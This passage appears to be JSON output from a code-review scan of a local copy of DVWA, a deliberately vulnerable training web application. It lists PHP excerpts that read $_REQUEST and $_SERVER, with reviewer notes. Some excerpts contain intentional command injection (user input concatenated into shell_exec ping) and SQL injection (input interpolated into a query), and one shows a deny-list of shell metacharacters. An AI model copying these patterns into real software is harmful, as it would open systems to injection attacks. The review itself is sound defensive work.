\t<span class=\"token variable\">$target</span> <span class=\"token operator\">=</span> <span class=\"token function\">stripslashes</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$target</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> \n<span class=\"line-number\">11:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Split the IP into <span class=\"token number\">4</span> octects\n<span class=\"line-number\">12:</span> \t<span class=\"token variable\">$octet</span> <span class=\"token operator\">=</span> <span class=\"token function\">explode</span><span class=\"token punctuation\">(</span> <span class=\"token string\">\".\"</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$target</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">13:</span> ",
  "line": 8,
  "start": 3,
  "end": 14,
  "severity": "unknown",
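  "note": "Line 8 reads the ip parameter from $_REQUEST, then lines 9 and 12 strip slashes and split it on dots. The octet checks and the command call are outside this excerpt; confirm every octet is validated as numeric before the value is used."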
 },
 {
  "id": 184,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/exec/source/low.php",
  "filetype": "php",
  "search": "\\s\\$_REQUEST",
  "match": "<span class=\"line-number\">1:</span> <span class=\"token operator\">&lt;</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Submit'</span> <span class=\"token punctuation\">]</span>  <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"highlight\"><span class=\"line-number\">5:</span> \t<span class=\"token variable\">$target</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'ip'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Determine OS <span class=\"token operator\">and</span> execute the ping command<span class=\"token punctuation\">.</span>\n<span class=\"line-number\">8:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">stristr</span><span class=\"token punctuation\">(</span> <span class=\"token function\">php_uname</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'s'</span> <span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'Windows NT'</span> <span class=\"token punctuation\">)</span> <span class=\"token 
punctuation\">)</span> {\n<span class=\"line-number\">9:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Windows\n<span class=\"line-number\">10:</span> \t\t<span class=\"token variable\">$cmd</span> <span class=\"token operator\">=</span> <span class=\"token function\">shell_exec</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'ping  '</span> <span class=\"token punctuation\">.</span> <span class=\"token variable\">$target</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
  "line": 5,
  "start": 1,
  "end": 11,
  "severity": "unknown",
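  "note": "Line 5 reads the ip parameter from $_REQUEST with no validation, and line 10 concatenates it into the shell_exec() ping command: OS command injection. Validate the value as an IP address (for example with filter_var and FILTER_VALIDATE_IP) or pass it through escapeshellarg() before it reaches the shell."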
 },
 {
  "id": 188,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/exec/source/medium.php",
  "filetype": "php",
  "search": "\\s\\$_REQUEST",
  "match": "<span class=\"line-number\">1:</span> <span class=\"token operator\">&lt;</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Submit'</span> <span class=\"token punctuation\">]</span>  <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"highlight\"><span class=\"line-number\">5:</span> \t<span class=\"token variable\">$target</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'ip'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Set blacklist\n<span class=\"line-number\">8:</span> \t<span class=\"token variable\">$substitutions</span> <span class=\"token operator\">=</span> <span class=\"token function\">array</span><span class=\"token punctuation\">(</span>\n<span class=\"line-number\">9:</span> \t\t<span class=\"token string\">'&amp;&amp;'</span> <span class=\"token operator\">=</span><span class=\"token operator\">></span> <span class=\"token string\">''</span><span class=\"token punctuation\">,</span>\n<span class=\"line-number\">10:</span> \t\t'<span class=\"token comment\" spellcheck=\"true\">;'  => '',</span>",
  "line": 5,
  "start": 1,
  "end": 11,
  "severity": "unknown",
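  "note": "Line 5 reads the ip parameter from $_REQUEST and the following lines build a substitution deny-list of shell metacharacters. The command sink is outside this excerpt, so confirm how $target is used; if it reaches a shell, a deny-list is not a sufficient control and the value should be validated as an IP address instead."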
 },
 {
  "id": 243,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/sqli/source/impossible.php",
  "filetype": "php",
  "search": "\\s\\$_REQUEST",
  "match": "<span class=\"line-number\">1:</span> <span class=\"token operator\">&lt;</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Submit'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check Anti<span class=\"token operator\">-</span>CSRF token\n<span class=\"highlight\"><span class=\"line-number\">5:</span> \t<span class=\"token function\">checkToken</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'user_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'session_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'index.php'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"line-number\">8:</span> \t<span class=\"token variable\">$id</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token 
string\">'id'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">9:</span> \n<span class=\"line-number\">10:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Was a number entered<span class=\"token operator\">?</span>",
  "line": 5,
  "start": 1,
  "end": 11,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 245,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/sqli/source/low.php",
  "filetype": "php",
  "search": "\\s\\$_REQUEST",
  "match": "<span class=\"line-number\">1:</span> <span class=\"token operator\">&lt;</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"highlight\"><span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Submit'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {</span>\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"line-number\">5:</span> \t<span class=\"token variable\">$id</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'id'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check database\n<span class=\"line-number\">8:</span> \t<span class=\"token variable\">$query</span>  <span class=\"token operator\">=</span> \"<span class=\"token keyword\">SELECT</span> first_name<span class=\"token punctuation\">,</span> last_name FROM users WHERE user_id <span class=\"token operator\">=</span> <span class=\"token string\">'$id'</span><span class=\"token comment\" spellcheck=\"true\">;\";</span>",
  "line": 3,
  "start": 1,
  "end": 9,
  "severity": "unknown",
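  "note": "This match is only the isset() guard on the Submit parameter. The tainted read is on line 5, where id from $_REQUEST is assigned and then interpolated into the SQL string built on line 8."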
 },
 {
  "id": 246,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/sqli/source/low.php",
  "filetype": "php",
  "search": "\\s\\$_REQUEST",
  "match": "<span class=\"line-number\">1:</span> <span class=\"token operator\">&lt;</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Submit'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"highlight\"><span class=\"line-number\">5:</span> \t<span class=\"token variable\">$id</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'id'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check database\n<span class=\"line-number\">8:</span> \t<span class=\"token variable\">$query</span>  <span class=\"token operator\">=</span> \"<span class=\"token keyword\">SELECT</span> first_name<span class=\"token punctuation\">,</span> last_name FROM users WHERE user_id <span class=\"token operator\">=</span> <span class=\"token string\">'$id'</span><span class=\"token comment\" spellcheck=\"true\">;\";</span>\n<span class=\"line-number\">9:</span> \t<span class=\"token variable\">$result</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_query</span><span class=\"token punctuation\">(</span><span class=\"token 
variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>  <span class=\"token variable\">$query</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">or</span> <span class=\"token function\">die</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'&lt;pre>'</span> <span class=\"token punctuation\">.</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_error</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$___mysqli_res</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_connect_error</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token variable\">$___mysqli_res</span> <span class=\"token punctuation\">:</span> <span class=\"token boolean\">false</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token 
punctuation\">.</span> <span class=\"token string\">'&lt;/pre>'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> ",
  "line": 5,
  "start": 1,
  "end": 11,
  "severity": "unknown",
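  "note": "Line 5 reads id from $_REQUEST and line 8 interpolates it into the SQL string that line 9 passes to mysqli_query(): SQL injection. Use a prepared statement with a bound parameter. The die() call on line 9 also returns the raw database error to the client; it should be logged server-side instead."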
 },
 {
  "id": 219,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/sqli_blind/source/impossible.php",
  "filetype": "php",
  "search": "\\s\\$_REQUEST",
  "match": "<span class=\"line-number\">1:</span> <span class=\"token operator\">&lt;</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Submit'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check Anti<span class=\"token operator\">-</span>CSRF token\n<span class=\"highlight\"><span class=\"line-number\">5:</span> \t<span class=\"token function\">checkToken</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'user_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'session_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'index.php'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"line-number\">8:</span> \t<span class=\"token variable\">$id</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token 
string\">'id'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">9:</span> \n<span class=\"line-number\">10:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Was a number entered<span class=\"token operator\">?</span>",
  "line": 5,
  "start": 1,
  "end": 11,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 262,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/upload/source/impossible.php",
  "filetype": "php",
  "search": "\\s\\$_REQUEST",
  "match": "<span class=\"line-number\">1:</span> <span class=\"token operator\">&lt;</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Upload'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check Anti<span class=\"token operator\">-</span>CSRF token\n<span class=\"highlight\"><span class=\"line-number\">5:</span> \t<span class=\"token function\">checkToken</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'user_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'session_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'index.php'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \n<span class=\"line-number\">8:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> File information\n<span class=\"line-number\">9:</span> \t<span class=\"token variable\">$uploaded_name</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_FILES</span><span 
class=\"token punctuation\">[</span> <span class=\"token string\">'uploaded'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'name'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> \t<span class=\"token variable\">$uploaded_ext</span>  <span class=\"token operator\">=</span> <span class=\"token function\">substr</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$uploaded_name</span><span class=\"token punctuation\">,</span> <span class=\"token function\">strrpos</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$uploaded_name</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'.'</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">+</span> <span class=\"token number\">1</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
  "line": 5,
  "start": 1,
  "end": 11,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 287,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/xss_r/source/impossible.php",
  "filetype": "php",
  "search": "\\s\\$_REQUEST",
  "match": "<span class=\"line-number\">1:</span> <span class=\"token operator\">&lt;</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"line-number\">3:</span> <span class=\"token operator\">/</span><span class=\"token operator\">/</span> Is there any input<span class=\"token operator\">?</span>\n<span class=\"line-number\">4:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">array_key_exists</span><span class=\"token punctuation\">(</span> <span class=\"token string\">\"name\"</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_GET</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">&amp;</span><span class=\"token operator\">&amp;</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'name'</span> <span class=\"token punctuation\">]</span> !<span class=\"token operator\">=</span> <span class=\"token keyword\">NULL</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">5:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check Anti<span class=\"token operator\">-</span>CSRF token\n<span class=\"highlight\"><span class=\"line-number\">6:</span> \t<span class=\"token function\">checkToken</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'user_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'session_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'index.php'</span> <span class=\"token 
punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">7:</span> \n<span class=\"line-number\">8:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"line-number\">9:</span> \t<span class=\"token variable\">$name</span> <span class=\"token operator\">=</span> <span class=\"token function\">htmlspecialchars</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'name'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> \n<span class=\"line-number\">11:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Feedback <span class=\"token keyword\">for</span> end user",
  "line": 6,
  "start": 1,
  "end": 12,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 301,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/xss_s/source/impossible.php",
  "filetype": "php",
  "search": "\\s\\$_REQUEST",
  "match": "<span class=\"line-number\">1:</span> <span class=\"token operator\">&lt;</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'btnSign'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check Anti<span class=\"token operator\">-</span>CSRF token\n<span class=\"highlight\"><span class=\"line-number\">5:</span> \t<span class=\"token function\">checkToken</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'user_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'session_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'index.php'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"line-number\">8:</span> \t<span class=\"token variable\">$message</span> <span class=\"token operator\">=</span> <span class=\"token function\">trim</span><span class=\"token punctuation\">(</span> <span class=\"token 
variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'mtxMessage'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">9:</span> \t<span class=\"token variable\">$name</span>    <span class=\"token operator\">=</span> <span class=\"token function\">trim</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'txtName'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> ",
  "line": 5,
  "start": 1,
  "end": 11,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 2,
  "file": "/home/chris/src/DVWA-master/dvwa/includes/DBMS/MySQL.php",
  "filetype": "php",
  "search": "\\s\\$_SERVER",
  "match": "<span class=\"line-number\">41:</span> <span class=\"token function\">dvwaMessagePush</span><span class=\"token punctuation\">(</span> <span class=\"token string\">\"'users' table was created.\"</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">42:</span> \n<span class=\"line-number\">43:</span> \n<span class=\"line-number\">44:</span> <span class=\"token operator\">/</span><span class=\"token operator\">/</span> Insert some data into users\n<span class=\"line-number\">45:</span> <span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get the base directory <span class=\"token keyword\">for</span> the avatar media<span class=\"token punctuation\">.</span><span class=\"token punctuation\">.</span><span class=\"token punctuation\">.</span>\n<span class=\"highlight\"><span class=\"line-number\">46:</span> <span class=\"token variable\">$baseUrl</span>  <span class=\"token operator\">=</span> <span class=\"token string\">'http://'</span> <span class=\"token punctuation\">.</span> <span class=\"token variable\">$_SERVER</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'SERVER_NAME'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">.</span> <span class=\"token variable\">$_SERVER</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'PHP_SELF'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">47:</span> <span class=\"token variable\">$stripPos</span> <span class=\"token operator\">=</span> <span class=\"token function\">strpos</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$baseUrl</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'setup.php'</span> <span class=\"token punctuation\">)</span><span class=\"token 
comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">48:</span> <span class=\"token variable\">$baseUrl</span>  <span class=\"token operator\">=</span> <span class=\"token function\">substr</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$baseUrl</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$stripPos</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">'hackable/users/'</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">49:</span> \n<span class=\"line-number\">50:</span> <span class=\"token variable\">$insert</span> <span class=\"token operator\">=</span> \"INSERT INTO users VALUES\n<span class=\"line-number\">51:</span> \t<span class=\"token punctuation\">(</span><span class=\"token string\">'1'</span><span class=\"token punctuation\">,</span><span class=\"token string\">'admin'</span><span class=\"token punctuation\">,</span><span class=\"token string\">'admin'</span><span class=\"token punctuation\">,</span><span class=\"token string\">'admin'</span><span class=\"token punctuation\">,</span><span class=\"token function\">MD5</span><span class=\"token punctuation\">(</span><span class=\"token string\">'password'</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span><span class=\"token string\">'{$baseUrl}admin.jpg'</span><span class=\"token punctuation\">,</span> <span class=\"token function\">NOW</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'0'</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span>",
  "line": 46,
  "start": 41,
  "end": 52,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 16,
  "file": "/home/chris/src/DVWA-master/dvwa/includes/dvwaPage.inc.php",
  "filetype": "php",
  "search": "\\s\\$_SERVER",
  "match": "<span class=\"line-number\">103:</span> \t<span class=\"token function\">unset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$dvwaSession</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'username'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">104:</span> }\n<span class=\"line-number\">105:</span> \n<span class=\"line-number\">106:</span> \n<span class=\"line-number\">107:</span> function <span class=\"token function\">dvwaPageReload</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> {\n<span class=\"highlight\"><span class=\"line-number\">108:</span> \t<span class=\"token function\">dvwaRedirect</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_SERVER</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'PHP_SELF'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">109:</span> }\n<span class=\"line-number\">110:</span> \n<span class=\"line-number\">111:</span> function <span class=\"token function\">dvwaCurrentUser</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">112:</span> \t<span class=\"token variable\">$dvwaSession</span> <span class=\"token operator\">=</span><span class=\"token operator\">&amp;</span> <span class=\"token function\">dvwaSessionGrab</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">113:</span> \treturn <span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token 
punctuation\">(</span> <span class=\"token variable\">$dvwaSession</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'username'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token variable\">$dvwaSession</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'username'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">''</span><span class=\"token punctuation\">)</span> <span class=\"token comment\" spellcheck=\"true\">;</span>",
  "line": 108,
  "start": 103,
  "end": 114,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 17,
  "file": "/home/chris/src/DVWA-master/dvwa/includes/dvwaPage.inc.php",
  "filetype": "php",
  "search": "\\s\\$_SERVER",
